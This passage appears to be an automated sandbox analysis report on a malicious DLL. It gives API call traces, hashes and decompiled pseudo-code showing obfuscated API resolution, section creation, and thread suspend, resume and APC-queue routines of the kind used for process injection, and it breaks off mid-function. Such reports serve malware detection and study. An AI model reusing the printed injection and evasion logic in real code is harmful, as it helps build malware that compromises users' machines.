                  • Part of subcall function 01C13CE5: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,01C152DD,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C13D4C
                  • Part of subcall function 01C13CE5: sprintf.NTDLL ref: 01C13D6D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                • lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • strcpy.NTDLL ref: 01C1530E
                • lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C11628: lstrlen.KERNEL32(?,?,?,00000000,?,01C15328,00000000,?,?,?,01C17675,?,021795B0), ref: 01C11639
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                  • Part of subcall function 01C173CA: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,01C15342,00000000,?,?,01C17675,?,021795B0), ref: 01C173D4
                  • Part of subcall function 01C173CA: _snprintf.NTDLL ref: 01C17432
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: c2946413e49c18e249382e4da44f36cdab2f93264e9f56799c19049f3236dcbd
                • Instruction ID: bc3d608ba5ba5f7a57c6cd66ab38460ee3907f937ecf4a5e004aa7b00469593c
                • Opcode Fuzzy Hash: c2946413e49c18e249382e4da44f36cdab2f93264e9f56799c19049f3236dcbd
                • Instruction Fuzzy Hash: 4111EC37981526F757127BB88C95CAF3B9DAFAB9607190015FB019710CDEB9CE0277A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046D4B88
                  • Part of subcall function 046CAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                  • Part of subcall function 046CAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                  • Part of subcall function 046CAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                  • Part of subcall function 046CAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                  • Part of subcall function 046CAEC5: CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                • ResumeThread.KERNEL32(00000004,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 046D4C42
                • WaitForSingleObject.KERNEL32(00000064), ref: 046D4C50
                • SuspendThread.KERNEL32(00000004), ref: 046D4C63
                  • Part of subcall function 046CA7FE: memset.NTDLL ref: 046CAABF
                • ResumeThread.KERNELBASE(00000004), ref: 046D4CE6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
                • String ID:
                • API String ID: 223543837-0
                • Opcode ID: 03a8ade4e4dd8eeb7046d5287dffb1a3e48ed9b3f4ed2517dc42d5247ba7632c
                • Instruction ID: dd8f5352518b7d1a8a689c6097500f604f4054873586425c6bc072c4e60ac9ec
                • Opcode Fuzzy Hash: 03a8ade4e4dd8eeb7046d5287dffb1a3e48ed9b3f4ed2517dc42d5247ba7632c
                • Instruction Fuzzy Hash: 5B418CB1900248AFEB21AF95CC84AAE7BB9FF44308F044569E91597250FB35AE51CB64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 01C163FF: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,?,?,?,?,01C12D5F), ref: 01C164CB
                  • Part of subcall function 01C13318: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01C13355
                  • Part of subcall function 01C13318: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 01C13386
                • SysAllocString.OLEAUT32(00000000), ref: 01C12D8B
                • SysAllocString.OLEAUT32(0070006F), ref: 01C12D9F
                • SysAllocString.OLEAUT32(00000000), ref: 01C12DB1
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E15
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E24
                • SysFreeString.OLEAUT32(00000000), ref: 01C12E2F
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                • String ID:
                • API String ID: 2831207796-0
                • Opcode ID: 59996a6351fa6befec7d214d53b67f73d94f915b0e79e96ec9d8531000fb8c0c
                • Instruction ID: 3fedf92b707321c24befd49751818a38e944eee897e7ee173fe409b9f9b3682d
                • Opcode Fuzzy Hash: 59996a6351fa6befec7d214d53b67f73d94f915b0e79e96ec9d8531000fb8c0c
                • Instruction Fuzzy Hash: 03315E36D00609EFDB11DFACC84469FBBB6AF4A201F144465EE11EB224DB71DA06CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,046ED514,?,046EA590,00000018,046CB772,00000000,00000002,046ED518,00000003,046ED514,00000000,005A95A8), ref: 046C6D8F
                • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,046ED514,?,046EA590,00000018,046CB772), ref: 046C6E1A
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046C6E42
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046C6E60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                • String ID:
                • API String ID: 3666628472-0
                • Opcode ID: 1b97d9d344addab490e636e31f1b9cb9839d1ebf3242cec5c8df4224784e0f48
                • Instruction ID: 3c7bfd3ce22460c4319eadc2832b2765967fa160f937a5355aa76fa16465b6b4
                • Opcode Fuzzy Hash: 1b97d9d344addab490e636e31f1b9cb9839d1ebf3242cec5c8df4224784e0f48
                • Instruction Fuzzy Hash: CA414AB1A00605EFDB11EF66C8849AEBBF5FF58300B10852EE9159B250E774FA41CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C121FA(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E01C12114(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x1c1a2d8; // 0x55d5a8
                					_t1 = _t23 + 0x1c1b11a; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x1c1a2d8; // 0x55d5a8
                					_t2 = _t26 + 0x1c1b782; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E01C12C11(_t54);
                					} else {
                						_t30 =  *0x1c1a2d8; // 0x55d5a8
                						_t5 = _t30 + 0x1c1b76f; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x1c1a2d8; // 0x55d5a8
                							_t7 = _t33 + 0x1c1b4ce; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x1c1a2d8; // 0x55d5a8
                								_t9 = _t36 + 0x1c1b406; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x1c1a2d8; // 0x55d5a8
                									_t11 = _t39 + 0x1c1b792; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E01C12F8D(_t54, _a8); // executed
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01C1122E,?,?,?,?,00000000,00000000), ref: 01C1221F
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01C12241
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 01C12257
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01C1226D
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01C12283
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01C12299
                  • Part of subcall function 01C12F8D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,01C122B9), ref: 01C12FEA
                  • Part of subcall function 01C12F8D: memset.NTDLL ref: 01C1300C
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: ae4a5ee4dbb98c7c6844c6c7fa83e13ba1221278f990e4acec299fc44d4e180b
                • Instruction ID: e82d943f4e4b69c3a1718e4da648c6cf223eadb4fc5867ffbd28bac0bedbe8c4
                • Opcode Fuzzy Hash: ae4a5ee4dbb98c7c6844c6c7fa83e13ba1221278f990e4acec299fc44d4e180b
                • Instruction Fuzzy Hash: 5C2191B558020AEFD720DFA9C884F9A7BFCFB1A654B144515E609C7215E770EA04DF70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,046CA90D,?,?,?,00000000,00000000), ref: 046C87F2
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8814
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C882A
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8840
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8856
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C886C
                  • Part of subcall function 046DBEBC: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 046DBF19
                  • Part of subcall function 046DBEBC: memset.NTDLL ref: 046DBF3D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 9884e10ac3b6cf853928977b4c76b9af6d3ea05e2f41cdf9fd0768f547c1e6f4
                • Instruction ID: a232829454814d7ea7ba410fe413ed42829420daf66edbbf082827a49f92ddf2
                • Opcode Fuzzy Hash: 9884e10ac3b6cf853928977b4c76b9af6d3ea05e2f41cdf9fd0768f547c1e6f4
                • Instruction Fuzzy Hash: 54212DB1A0220AEFD720EF69C948E6A77ECEB046847058569E909CB651F739F9058B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,046D2BEA), ref: 046D9DDD
                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 046D9DF2
                • GetLastError.KERNEL32(00000000), ref: 046D9DFD
                • TerminateThread.KERNEL32(00000000,00000000), ref: 046D9E07
                • CloseHandle.KERNEL32(00000000), ref: 046D9E0E
                • SetLastError.KERNEL32(00000000), ref: 046D9E17
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID:
                • API String ID: 3832013932-0
                • Opcode ID: 68cffa5c6b6e2e882e1000bffb5505bb03443d29f6c895b31499679aa941fb3e
                • Instruction ID: 73006fb66f74afdb6416620ada9f4452a808361c730302c146e97c25c788a9d0
                • Opcode Fuzzy Hash: 68cffa5c6b6e2e882e1000bffb5505bb03443d29f6c895b31499679aa941fb3e
                • Instruction Fuzzy Hash: 7FF01232505222EBD7212FA2AD08F9BBBE9FF19751F04540CF6019B154E73A9D109BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E01C11B78(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t59;
                				intOrPtr* _t60;
                				void* _t62;
                				intOrPtr _t64;
                				char _t65;
                				void* _t67;
                				intOrPtr _t68;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				void* _t73;
                				signed int _t81;
                				void* _t91;
                				void* _t92;
                				char _t98;
                				signed int* _t100;
                				intOrPtr* _t101;
                				void* _t102;
                
                				_t92 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t98 = _a16;
                				if(_t98 == 0) {
                					__imp__( &_v284,  *0x1c1a39c);
                					_t91 = 0x80000002;
                					L6:
                					_t59 = E01C123CC( &_v284,  &_v284);
                					_a8 = _t59;
                					if(_t59 == 0) {
                						_v8 = 8;
                						L29:
                						_t60 = _a20;
                						if(_t60 != 0) {
                							 *_t60 =  *_t60 + 1;
                						}
                						return _v8;
                					}
                					_t101 = _a24;
                					_t62 = E01C177FE(_t92, _t97, _t101, _t91, _t59); // executed
                					if(_t62 != 0) {
                						L27:
                						E01C12C11(_a8);
                						goto L29;
                					}
                					_t64 =  *0x1c1a2d0; // 0x2179b30
                					_t16 = _t64 + 0xc; // 0x2179bfe
                					_t65 = E01C123CC(_t64,  *_t16);
                					_a24 = _t65;
                					if(_t65 == 0) {
                						L14:
                						_t29 = _t101 + 0x14; // 0x102
                						_t33 = _t101 + 0x10; // 0x3d01c190, executed
                						_t67 = E01C15173(_t97,  *_t33, _t91, _a8,  *0x1c1a394,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                						if(_t67 == 0) {
                							_t68 =  *0x1c1a2d8; // 0x55d5a8
                							if(_t98 == 0) {
                								_t35 = _t68 + 0x1c1ba48; // 0x4d4c4b48
                								_t69 = _t35;
                							} else {
                								_t34 = _t68 + 0x1c1ba43; // 0x55434b48
                								_t69 = _t34;
                							}
                							if(E01C13964(_t69,  *0x1c1a394,  *0x1c1a398,  &_a24,  &_a16) == 0) {
                								if(_t98 == 0) {
                									_t71 =  *0x1c1a2d8; // 0x55d5a8
                									_t44 = _t71 + 0x1c1b83e; // 0x74666f53
                									_t73 = E01C123CC(_t44, _t44);
                									_t99 = _t73;
                									if(_t73 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t101 + 0x10; // 0x3d01c190
                										E01C12BC9( *_t47, _t91, _a8,  *0x1c1a398, _a24);
                										_t49 = _t101 + 0x10; // 0x3d01c190
                										E01C12BC9( *_t49, _t91, _t99,  *0x1c1a390, _a16);
                										E01C12C11(_t99);
                									}
                								} else {
                									_t40 = _t101 + 0x10; // 0x3d01c190
                									E01C12BC9( *_t40, _t91, _a8,  *0x1c1a398, _a24);
                									_t43 = _t101 + 0x10; // 0x3d01c190
                									E01C12BC9( *_t43, _t91, _a8,  *0x1c1a390, _a16);
                								}
                								if( *_t101 != 0) {
                									E01C12C11(_a24);
                								} else {
                									 *_t101 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t101 + 0x10; // 0x3d01c190, executed
                					_t81 = E01C155E9( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                					if(_t81 == 0) {
                						_t100 = _v16;
                						if(_v12 == 0x28) {
                							 *_t100 =  *_t100 & _t81;
                							_t26 = _t101 + 0x10; // 0x3d01c190
                							E01C15173(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                						}
                						E01C12C11(_t100);
                						_t98 = _a16;
                					}
                					E01C12C11(_a24);
                					goto L14;
                				}
                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t97 = _a8;
                					E01C17A9C(_t98, _a8,  &_v284);
                					__imp__(_t102 + _t98 - 0x117,  *0x1c1a39c);
                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                					_t91 = 0x80000003;
                					goto L6;
                				}
                			}

                APIs
                • StrChrA.SHLWAPI(01C161AC,0000005F,00000000,00000000,00000104), ref: 01C11BAB
                • lstrcpy.KERNEL32(?,?), ref: 01C11BD8
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                  • Part of subcall function 01C12BC9: lstrlenW.KERNEL32(?,?,?,01C11D41,3D01C190,80000002,01C161AC,01C119CD,74666F53,4D4C4B48,01C119CD,?,3D01C190,80000002,01C161AC,?), ref: 01C12BEE
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • lstrcpy.KERNEL32(?,00000000), ref: 01C11BFA
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: f34d3df4431f2366c5f9184a6428531f9bf20442c556c5ec2bcab9cd533c6117
                • Instruction ID: 41d1588e9f03977d2e0a9571f80415316cabd5f2417f731f66fc35e02eb85264
                • Opcode Fuzzy Hash: f34d3df4431f2366c5f9184a6428531f9bf20442c556c5ec2bcab9cd533c6117
                • Instruction Fuzzy Hash: 10518D3618020AEFDF22AFA4DC40EAA7BB9FF5B710F544414FA1592028D739DA25FB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E01C17253(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                				void* _v8;
                				char _v48;
                				void* __edi;
                				intOrPtr _t22;
                				void* _t26;
                				intOrPtr _t30;
                				intOrPtr _t37;
                				intOrPtr* _t43;
                				void* _t44;
                				void* _t48;
                				intOrPtr* _t49;
                				void* _t50;
                				intOrPtr _t51;
                
                				_t48 = __edx;
                				_t44 = __ecx;
                				_t43 = _a16;
                				_t49 = __eax;
                				_t22 =  *0x1c1a2d8; // 0x55d5a8
                				_t2 = _t22 + 0x1c1b682; // 0x657a6973
                				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                				_t51 =  *0x1c1a3a0; // 0x2179b20
                				_push(0x800);
                				_push(0);
                				_push( *0x1c1a290);
                				if( *0x1c1a2a4 >= 5) {
                					_t26 = RtlAllocateHeap(); // executed
                					if(_t26 == 0) {
                						L6:
                						_a4 = 8;
                						L7:
                						if(_a4 != 0) {
                							L10:
                							 *0x1c1a2a4 =  *0x1c1a2a4 + 1;
                							L11:
                							return _a4;
                						}
                						_t52 = _a16;
                						 *_t49 = _a16;
                						_t50 = _v8;
                						 *_t43 = E01C16576(_t52, _t50); // executed
                						_t30 = E01C14F81(_t50, _t52); // executed
                						if(_t30 != 0) {
                							 *_a8 = _t50;
                							 *_a12 = _t30;
                							if( *0x1c1a2a4 < 5) {
                								 *0x1c1a2a4 =  *0x1c1a2a4 & 0x00000000;
                							}
                							goto L11;
                						}
                						_a4 = 0xbf;
                						E01C151B1();
                						HeapFree( *0x1c1a290, 0, _t50);
                						goto L10;
                					}
                					_t37 = E01C174A5(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                					L5:
                					_a4 = _t37;
                					goto L7;
                				}
                				if(RtlAllocateHeap() == 0) {
                					goto L6;
                				}
                				_t37 = E01C14062(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38);
                				goto L5;
                			}

                APIs
                • wsprintfA.USER32 ref: 01C17275
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C1729A
                  • Part of subcall function 01C14062: GetTickCount.KERNEL32 ref: 01C14076
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C140C6
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C140E3
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C14103
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C1412F
                  • Part of subcall function 01C14062: HeapFree.KERNEL32(00000000,00000000), ref: 01C14141
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C14162
                  • Part of subcall function 01C14062: HeapFree.KERNEL32(00000000,00000000), ref: 01C14172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C172BC
                • HeapFree.KERNEL32(00000000,?,?), ref: 01C17320
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$Allocate$CountTick
                • String ID: Ut
                • API String ID: 1428766365-8415677
                • Opcode ID: e849aba733561b262ec11c2b7bc4f538ec80d6bd5ce986ebe95a413bd2cec4d5
                • Instruction ID: dbf4039abb45d7556af8aa56685f153b3f937802123cd6d62b0f3542e094ff2c
                • Opcode Fuzzy Hash: e849aba733561b262ec11c2b7bc4f538ec80d6bd5ce986ebe95a413bd2cec4d5
                • Instruction Fuzzy Hash: BF312871581219EFCB11DFA4D984BDA3BBCBF1A354F108016F906A7249DB70DA05EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E01C1219A(void** __esi) {
                				intOrPtr _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				void* _t9;
                				intOrPtr _t10;
                				void* _t11;
                				void** _t13;
                
                				_t13 = __esi;
                				_t4 =  *0x1c1a384; // 0x21795b0
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x1c1a384; // 0x21795b0
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t13;
                				if(_t8 != 0 && _t8 != 0x1c1a004) {
                					HeapFree( *0x1c1a290, 0, _t8);
                				}
                				_t9 = E01C11590(_v0, _t13); // executed
                				_t13[1] = _t9;
                				_t10 =  *0x1c1a384; // 0x21795b0
                				_t11 = _t10 + 0x40;
                				__imp__(_t11);
                				return _t11;
                			}

                APIs
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C121A3
                • Sleep.KERNEL32(0000000A), ref: 01C121AD
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C121D5
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C121F1
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 2632fa421b92ea512533d9abd98962b3feddc66aca6d9830f4bad7378f82a920
                • Instruction ID: 9256b8832160d8d56eb89542f616849eef44abe1f5345f7b67911e0465bc1f04
                • Opcode Fuzzy Hash: 2632fa421b92ea512533d9abd98962b3feddc66aca6d9830f4bad7378f82a920
                • Instruction Fuzzy Hash: 6EF05E78281280DBEB30CB69D948F163BB8BB27744B244408FA0BC7659D234D950DB15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E01C134A2(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				void* _t32;
                				CHAR* _t36;
                				CHAR* _t42;
                				CHAR* _t43;
                				CHAR* _t44;
                				void* _t49;
                				void* _t51;
                				signed char _t56;
                				intOrPtr _t58;
                				signed int _t59;
                				void* _t63;
                				CHAR* _t67;
                				CHAR* _t68;
                				char* _t69;
                				void* _t70;
                
                				_t61 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E01C13B98();
                				if(_t21 != 0) {
                					_t59 =  *0x1c1a2b4; // 0x2000000a
                					_t55 = (_t59 & 0xf0000000) + _t21;
                					 *0x1c1a2b4 = (_t59 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x1c1a148(0, 2); // executed
